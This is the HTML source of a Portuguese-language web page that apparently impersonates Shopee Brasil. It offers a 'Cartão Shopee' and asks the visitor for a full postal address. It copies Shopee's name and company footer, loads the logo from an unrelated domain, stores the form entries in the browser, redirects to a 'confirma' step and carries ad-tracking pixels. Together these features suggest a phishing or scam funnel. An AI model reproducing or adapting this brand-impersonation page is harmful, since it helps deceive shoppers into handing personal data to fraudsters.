﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Endereço</title>





    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->








    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1F2937;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .title {
            font-size: 1.25rem;
            font-weight: 600;
            color: #1F2937;
            margin-bottom: 0.5rem;
        }

        .subtitle {
            color: #6B7280;
            margin-bottom: 2rem;
            font-size: 1rem;
        }

        .form-label {
            display: block;
            font-size: 0.9375rem;
            font-weight: 500;
            color: #4B5563;
            margin-bottom: 0.5rem;
        }

        .form-control, .form-select {
            width: 100%;
            padding: 0.875rem;
            border: 1px solid #E5E7EB;
            border-radius: 8px;
            font-size: 1rem;
            color: #1F2937;
            transition: all 0.2s ease;
            background: white !important;
        }

        .form-control:focus, .form-select:focus {
            border-color: #EE4D2D;
            outline: none;
            box-shadow: 0 0 0 2px rgba(238, 77, 45, 0.1);
        }

        .form-control.campo-erro {
            border-color: #EF4444;
            background: #FEF2F2 !important;
        }

        .mensagem-erro {
            color: #EF4444;
            font-size: 0.875rem;
            margin-top: 0.375rem;
        }

        .mb-3 {
            margin-bottom: 1.25rem;
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 50px;
            font-size: 1rem;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1rem;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <h4 class="title">Vamos enviar seu cartão pelos Correios</h4>
            <p class="subtitle">Informe seu endereço:</p>
            
            <form id="form-endereco" class="text-start">
                <div class="mb-3">
                    <label for="cep" class="form-label">CEP</label>
                    <input type="text" class="form-control" id="cep" placeholder="00000-000" onblur="buscarCEP()">
                </div>
                <div id="endereco-completo">
                    <div class="mb-3">
                        <label for="rua" class="form-label">Rua</label>
                        <input type="text" class="form-control" id="rua">
                    </div>
                    <div class="mb-3">
                        <label for="numero" class="form-label">Número</label>
                        <input type="text" class="form-control" id="numero">
                    </div>
                    <div class="mb-3">
                        <label for="complemento" class="form-label">Complemento</label>
                        <input type="text" class="form-control" id="complemento">
                    </div>
                    <div class="mb-3">
                        <label for="bairro" class="form-label">Bairro</label>
                        <input type="text" class="form-control" id="bairro">
                    </div>
                    <div class="mb-3">
                        <label for="cidade" class="form-label">Cidade</label>
                        <input type="text" class="form-control" id="cidade">
                    </div>
                    <div class="mb-3">
                        <label for="estado" class="form-label">Estado</label>
                        <select class="form-select" id="estado">
                            <option value="AC">Acre</option>
                            <option value="AL">Alagoas</option>
                            <option value="AP">Amapá</option>
                            <option value="AM">Amazonas</option>
                            <option value="BA">Bahia</option>
                            <option value="CE">Ceará</option>
                            <option value="DF">Distrito Federal</option>
                            <option value="ES">Espírito Santo</option>
                            <option value="GO">Goiás</option>
                            <option value="MA">Maranhão</option>
                            <option value="MT">Mato Grosso</option>
                            <option value="MS">Mato Grosso do Sul</option>
                            <option value="MG">Minas Gerais</option>
                            <option value="PA">Pará</option>
                            <option value="PB">Paraíba</option>
                            <option value="PR">Paraná</option>
                            <option value="PE">Pernambuco</option>
                            <option value="PI">Piauí</option>
                            <option value="RJ">Rio de Janeiro</option>
                            <option value="RN">Rio Grande do Norte</option>
                            <option value="RS">Rio Grande do Sul</option>
                            <option value="RO">Rondônia</option>
                            <option value="RR">Roraima</option>
                            <option value="SC">Santa Catarina</option>
                            <option value="SP">São Paulo</option>
                            <option value="SE">Sergipe</option>
                            <option value="TO">Tocantins</option>
                        </select>
                    </div>
    
                    <button type="submit" class="btn-custom">Continuar</button>
                </div>
            </form>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    function buscarCEP() {
        const cep = document.getElementById('cep').value;
        if (cep) {
            fetch(`https://viacep.com.br/ws/${cep}/json/`)
                .then(response => response.json())
                .then(data => {
                    if (!data.erro) {
                        localStorage.setItem('rua', data.logradouro);
                        localStorage.setItem('numero', '');
                        localStorage.setItem('complemento', '');
                        localStorage.setItem('bairro', data.bairro);
                        localStorage.setItem('cidade', data.localidade);
                        localStorage.setItem('estado', data.uf);
                        localStorage.setItem('cep', cep);

                        document.getElementById('rua').value = data.logradouro;
                        document.getElementById('bairro').value = data.bairro;
                        document.getElementById('cidade').value = data.localidade;
                        document.getElementById('estado').value = data.uf;
                    } else {
                        alert('CEP não encontrado.');
                    }
                })
                .catch(error => {
                    alert('Erro ao buscar CEP.');
                    console.error('Erro:', error);
                });
        }
    }
    
    document.getElementById('form-endereco').addEventListener('submit', function(event) {
        event.preventDefault();
        
        const campos = ['rua', 'bairro', 'numero', 'complemento', 'cidade', 'estado', 'cep'];
        let formValido = true;

        function mostrarErro(campo, mensagem) {
            limparErros(campo);
            const mensagemErro = document.createElement('div');
            mensagemErro.className = 'mensagem-erro';
            mensagemErro.innerText = mensagem;
            campo.classList.add('campo-erro');
            campo.parentNode.appendChild(mensagemErro);
            formValido = false;
        }

        function limparErros(campo) {
            campo.classList.remove('campo-erro');
            const erroAnterior = campo.parentNode.querySelector('.mensagem-erro');
            if (erroAnterior) {
                erroAnterior.remove();
            }
        }

        campos.forEach(campoId => {
            const campo = document.getElementById(campoId);
            limparErros(campo);
            
            if (campo.value.trim() === '' && campoId !== 'complemento') {
                mostrarErro(campo, 'Este campo é obrigatório');
            }
        });
        
        if(formValido) {
            campos.forEach(campoId => {
                const campo = document.getElementById(campoId);
                localStorage.setItem(campoId, campo.value.trim());
            });
            window.location.href = 'confirma/index.php.html';
        }
    });
</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
    window.pixelId = "678838a121a1854bae5e0469";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
</script>
</body>
</html>